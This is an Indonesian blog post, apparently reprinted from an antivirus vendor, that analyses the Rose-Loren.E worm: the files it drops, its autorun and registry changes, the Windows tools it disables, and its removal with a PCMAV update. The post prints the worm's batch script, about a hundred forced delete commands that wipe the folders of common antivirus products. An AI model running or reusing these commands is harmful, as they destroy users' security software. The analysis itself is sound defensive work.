farfromfearless

Rose-Loren.E:’Rose’ Ada karena ‘Cinta’

  • Posted: June 12, 2011
  • |
  • Author: riandragon89
  • |
  • Filed under: Jaringan komputer
  • |
  • Tags: No tags set for this entry.

Rose-Loren.E. Tidak selamanya dunia malware itu terkesan hitam dan jahat. Karena Rose-Loren dan salah satu variannya yang di bahas kali ini lebih mengesankan kepiluan serta rasa kesedihan yang dirasakan oleh pembuatnya. Jika bunga mawar umumnya mencirikan perasaan cinta, Rose-Loren membuat bunga mawar sebagai tanda kedatangannya.

A. Info Malware
Nama: Rose-Loren.E
Asal: Indonesia
Ukuran File: 91.7 KB (93,961 bytes)
Packer : Unknown
Pemrograman : Visual Basic
Icon : Folder Windows
Tipe : Worm

B. Tentang Malware
Sepertinya ini adalah hasil dari modifikasi dari source terdahulu karena sudah cukup lama kami mendapatkan variant dari Rose-Loren. eSetelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Saat worm ini aktif di memory, komputer akan terasa lambat karena proses Rose-Loren.E menyita resource yang cukup besar.

C. Companion/File yang dibuat
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:

Membuat file yang merupakan file induk/host dari worm, yaitu
C:\WINDOWS\system32\[5 buah bilangan acak]\lsass.exe dan
C:\WINDOWS\system32\[5 buah bilangan acak]\svchost.exe
Membuat juga file dengan nama EpIoler dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112

del /f /q /s C:\ESET\*.* >nul
del /f /q /s C:\antivi~1\*.* >nul
del /f /q /s C:\antivi~2\*.* >nul
del /f /q /s C:\antiviru\*.* >nul
del /f /q /s C:\avg\*.* >nul
del /f /q /s C:\kasper~1\*.* >nul
del /f /q /s C:\kasper~2\*.* >nul
del /f /q /s C:\mcafee\*.* >nul
del /f /q /s C:\mcafee.com\agent\*.* >nul
del /f /q /s C:\mcafee.com\*.* >nul
del /f /q /s C:\mcafee.com\VSO\*.* >nul
del /f /q /s C:\mcafee~1\*.* >nul
del /f /q /s C:\msav\*.* >nul
del /f /q /s C:\norman\*.* >nul
del /f /q /s C:\norton~1\*.* >nul
del /f /q /s C:\norton~2\*.* >nul
del /f /q /s C:\pav\*.* >nul
del /f /q /s C:\pccill~1\*.* >nul
del /f /q /s C:\iolo\*.* >nul
del /f /q /s C:\progra~1\ESET\*.* >nul
del /f /q /s C:\progra~1\antivi~1\*.* >nul
del /f /q /s C:\progra~1\antivi~2\*.* >nul
del /f /q /s C:\progra~1\avg\*.* >nul
del /f /q /s C:\progra~1\kasper~1\*.* >nul
del /f /q /s C:\progra~1\kasper~2\*.* >nul
del /f /q /s C:\progra~1\mcafee\*.* >nul
del /f /q /s C:\progra~1\McAfee.com\agent\*.* >nul
del /f /q /s C:\progra~1\McAfee.com\\*.* >nul
del /f /q /s C:\progra~1\McAfee.com\VSO\*.* >nul
del /f /q /s C:\progra~1\mcafee~1\*.* >nul
del /f /q /s C:\progra~1\mindso~1\*.* >nul
del /f /q /s C:\progra~1\norman\*.* >nul
del /f /q /s C:\progra~1\norton~1\*.* >nul
del /f /q /s C:\progra~1\norton~2\*.* >nul
del /f /q /s C:\progra~1\pandas~1\*.* >nul
del /f /q /s C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s C:\progra~1\iolo\*.* >nul
del /f /q /s /a:h C:\ESET\*.* >nul
del /f /q /s /a:h C:\antivi~1\*.* >nul
del /f /q /s /a:h C:\antivi~2\*.* >nul
del /f /q /s /a:h C:\antiviru\*.* >nul
del /f /q /s /a:h C:\avg\*.* >nul
del /f /q /s /a:h C:\kasper~1\*.* >nul
del /f /q /s /a:h C:\kasper~2\*.* >nul
del /f /q /s /a:h C:\mcafee\*.* >nul
del /f /q /s /a:h C:\mcafee.com\agent\*.* >nul
del /f /q /s /a:h C:\mcafee.com\VSO\*.* >nul
del /f /q /s /a:h C:\mcafee~1\*.* >nul
del /f /q /s /a:h C:\msav\*.* >nul
del /f /q /s /a:h C:\norman\*.* >nul
del /f /q /s /a:h C:\norton~1\*.* >nul
del /f /q /s /a:h C:\norton~2\*.* >nul
del /f /q /s /a:h C:\pav\*.* >nul
del /f /q /s /a:h C:\pccill~1\*.* >nul
del /f /q /s /a:h C:\pc-cil~1\*.* >nul
del /f /q /s /a:h C:\iolo\*.* >nul
del /f /q /s /a:h C:\progra~1\ESET\*.* >nul
del /f /q /s /a:h C:\progra~1\antivi~1\*.* >nul
del /f /q /s /a:h C:\progra~1\antivi~2\*.* >nul
del /f /q /s /a:h C:\progra~1\avg\*.* >nul
del /f /q /s /a:h C:\progra~1\kasper~1\*.* >nul
del /f /q /s /a:h C:\progra~1\kasper~2\*.* >nul
del /f /q /s /a:h C:\progra~1\mcafee\*.* >nul
del /f /q /s /a:h C:\progra~1\mcafee.com\agent\*.* >nul
del /f /q /s /a:h C:\progra~1\mcafee.com\*.* >nul
del /f /q /s /a:h C:\progra~1\mcafee.com\VSO\*.* >nul
del /f /q /s /a:h C:\progra~1\mcafee~1\*.* >nul
del /f /q /s /a:h C:\progra~1\mindso~1\*.* >nul
del /f /q /s /a:h C:\progra~1\norman\*.* >nul
del /f /q /s /a:h C:\progra~1\norton~1\*.* >nul
del /f /q /s /a:h C:\progra~1\norton~2\*.* >nul
del /f /q /s /a:h C:\progra~1\pandas~1\*.* >nul
del /f /q /s /a:h C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s /a:h C:\progra~1\iolo\*.* >nul
del /f /q /s /a:R C:\ESET\*.* >nul
del /f /q /s /a:R C:\antivi~1\*.* >nul
del /f /q /s /a:R C:\antivi~2\*.* >nul
del /f /q /s /a:R C:\antiviru\*.* >nul
del /f /q /s /a:R C:\avg\*.* >nul
del /f /q /s /a:R C:\kasper~1\*.* >nul
del /f /q /s /a:R C:\kasper~2\*.* >nul
del /f /q /s /a:R C:\mcafee\*.* >nul
del /f /q /s /a:R C:\mcafee.com\agent\*.* >nul
del /f /q /s /a:R C:\mcafee.com\*.* >nul
del /f /q /s /a:R C:\mcafee.com\VSO\*.* >nul
del /f /q /s /a:R C:\mcafee~1\*.* >nul
del /f /q /s /a:R C:\msav\*.* >nul
del /f /q /s /a:R C:\norman\*.* >nul
del /f /q /s /a:R C:\norton~1\*.* >nul
del /f /q /s /a:R C:\norton~2\*.* >nul
del /f /q /s /a:R C:\pav\*.* >nul
del /f /q /s /a:R C:\pccill~1\*.* >nul
del /f /q /s /a:R C:\pc-cil~1\*.* >nul
del /f /q /s /a:R C:\iolo\*.* >nul
del /f /q /s /a:R C:\progra~1\ESET\*.* >nul
del /f /q /s /a:R C:\progra~1\antivi~1\*.* >nul
del /f /q /s /a:R C:\progra~1\antivi~2\*.* >nul
del /f /q /s /a:R C:\progra~1\avg\*.* >nul
del /f /q /s /a:R C:\progra~1\kasper~1\*.* >nul
del /f /q /s /a:R C:\progra~1\kasper~2\*.* >nul
del /f /q /s /a:R C:\progra~1\mcafee\*.* >nul
del /f /q /s /a:R C:\progra~1\mcafee.com\*.* >nul
del /f /q /s /a:R C:\progra~1\mcafee.com\agent\*.* >nul
del /f /q /s /a:R C:\progra~1\mcafee.com\VSO\*.* >nul
del /f /q /s /a:R C:\progra~1\mcafee~1\*.* >nul
del /f /q /s /a:R C:\progra~1\mindso~1\*.* >nul
del /f /q /s /a:R C:\progra~1\norman\*.* >nul
del /f /q /s /a:R C:\progra~1\norton~1\*.* >nul
del /f /q /s /a:R C:\progra~1\norton~2\*.* >nul
del /f /q /s /a:R C:\progra~1\pandas~1\*.* >nul
del /f /q /s /a:R C:\Progra~1\Alwils~1\*.* >nul
del /f /q /s /a:R C:\progra~1\iolo\*.* >nul
Jika ditemukan folder WinRar pada folder Program Files, maka Rose-Loren akan langsung mengcopykan file data.exe data.exe dan file gambar rose.jpg.
2.rose Rose Loren.E:’Rose’ Ada karena ‘Cinta’
Membuat file dengan nama private.zip yang isinya file worm dengan nama data.exe pada setiap drive termasuk di flash disk.
Membuat file dengan nama myrose.html, dan di dalamnya tersisip pesan berupa puisi cinta yang akan terlihat jika membuka code htmlnya.
3.bunga Rose Loren.E:’Rose’ Ada karena ‘Cinta’4.puisi Rose Loren.E:’Rose’ Ada karena ‘Cinta’
Merubah icon pada flash disk karena adanya file autorun.inf serta file desktop.ini yang merubah background flash disk menjadi bunga mawar. Yang berbeda adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.
5.explorer Rose Loren.E:’Rose’ Ada karena ‘Cinta’6.autorun Rose Loren.E:’Rose’ Ada karena ‘Cinta’

D. Hasil Infeksi

Worm ini banyak melakukan perubahan pada registry, terlihat pada Legal Notification sebelum tampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap kalimat yang di injeksikan ke registry. Sebagai contoh adalah gambar ini:
7.logon Rose Loren.E:’Rose’ Ada karena ‘Cinta’

Text yang dirandom adalah:

Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti orang lain
Mahkota kemanusiaan ialah rendah hati
Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang
Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu baik dan burukmu
Sabar adalah jalan keluar bagi orang yang tidak bisa menemukan jalan keluar.
Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.
Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna
Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.
Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.
Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.
Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier
Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.
Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda
Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.
Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.
Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak
Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.
Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.
Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius
Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidia Ali)
Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.
Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.
Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan
Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu
Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.
Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.
Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong.

Worm juga menghilangkan beberapa menu pada Folder Options.

8.folderoption Rose Loren.E:’Rose’ Ada karena ‘Cinta’

Payload lainnya adalah merubah tampilan properties pada My Computers.

9.system Rose Loren.E:’Rose’ Ada karena ‘Cinta’

Beberapa registry juga diubah, termasuk mendisable beberapa sistem Windows.

Regedit.exe
Msconfig.exe
taskmgr.exe
ntvdm.exe
rstrui.exe
EnableExtensions
FolderContentsInfoTip
NoRun
NoFind
DisableCurrentUserRun
HideFileExt
FolderSizeTip
ShowFullPathAddress
ShowFullPath
Disable SafeMode
Disable Show Hidden and Super Hidden files.

Worm juga akan membuat startup dengan nama WinUp dan RsWin.
E. Pembersihan

Mulai PCMAV 4.7 Update Build1, Rose-Loren.E beserta file-file companionnya telah dapat dikenali dan dibersihkan dari sistem komputer Anda.

rtp Rose Loren.E:’Rose’ Ada karena ‘Cinta’

PCMAV 4.7 Update Build1

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build1 telah hadir dengan penambahan 72 pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com

ZippyShare.com (mirror)

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 4.7 Update Build1:
AlamarPica.vbs
AnitaLoroaji
AnitaLoroaji.inf
Autoit-Cyrillic
Autoit-ReplaceIcon.D
Autoit-ReplaceIcon.E
Autoit-ReplaceIcon.F
Autoit.FD
Autoit.FD.ini
Autoit.FE
Autoit.FE.serv
Cobax.exe.C
Dhoos
Dhoos.dll
Dhoos.url.A
Dhoos.url.B
Dhoos.url.C
FakeAV
FakeAV-Downloader.K
FakeAV-Downloader.K.dat
FakeAV-Downloader.K.dll.A
FakeAV-Downloader.K.dll.B
FakeAV-Downloader.K.dll.C
FakeAV-Downloader.K.job
FakeAV-Downloader.K.lnk.A
FakeAV-Downloader.K.lnk.B
FakeAV-Downloader.K.lnk.C
FakeAV-Downloader.K.lnk.D
FakeAV-Downloader.K.ref
FakeAV-Downloader.K.rtf
FakeAV-Downloader.K.setup
FakeAV-Downloader.K.unins
FakeAV-Downloader.K.url
Fakhricker.vbs
Gabest.B
GavGent-HVM31
GXRG-Snow.vbs
GXRG-Snow.vbs.host
GXRG-Snow.vbs.inf
GXRG.vbs
GXRG.vbs.inf
H323
H323.bat
KefiUnique.vbs
KefiUnique.vbs.txt
KefiUnique.vbs.upd
Lz32.vbs.B
Lz32.vbs.C
Ossep.vbs
Ossep.vbs.inf
Ramnit.A.Variant
Ramnit.B.Variant
Ramnit.C.Variant
Ramnit.D.Variant
Ramnit.E.Variant
Ronkor.C
Ronkor.C.htt
Ronkor.C.txt
Rose-Loren.E
TripleExe
TripleExe.inf
VB-Shortcut-1.lnk
XSample.vbs
XSample.vbs.inf
XSample.vbs.ini
XSample.vbs.lnk.A
XSample.vbs.lnk.B
XSample.vbs.lnk.C
XSample.vbs.lnk.D
XSample.vbs.lnk.E
XSample.vbs.lnk.F
XSample.vbs.mp3

(SUMBER)

No comments as yet.

Anonymous - Gravatar

No comments have yet been made to this posting.

Commentors on this Post-

Leave a Comment-

Comment Guidelines: Basic XHTML is allowed (a href, strong, em, code). All line breaks and paragraphs are automatically generated. Off-topic or inappropriate comments will be edited or deleted. Email addresses will never be published. Keep it PG-13 people!

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

All fields marked with "*" are required.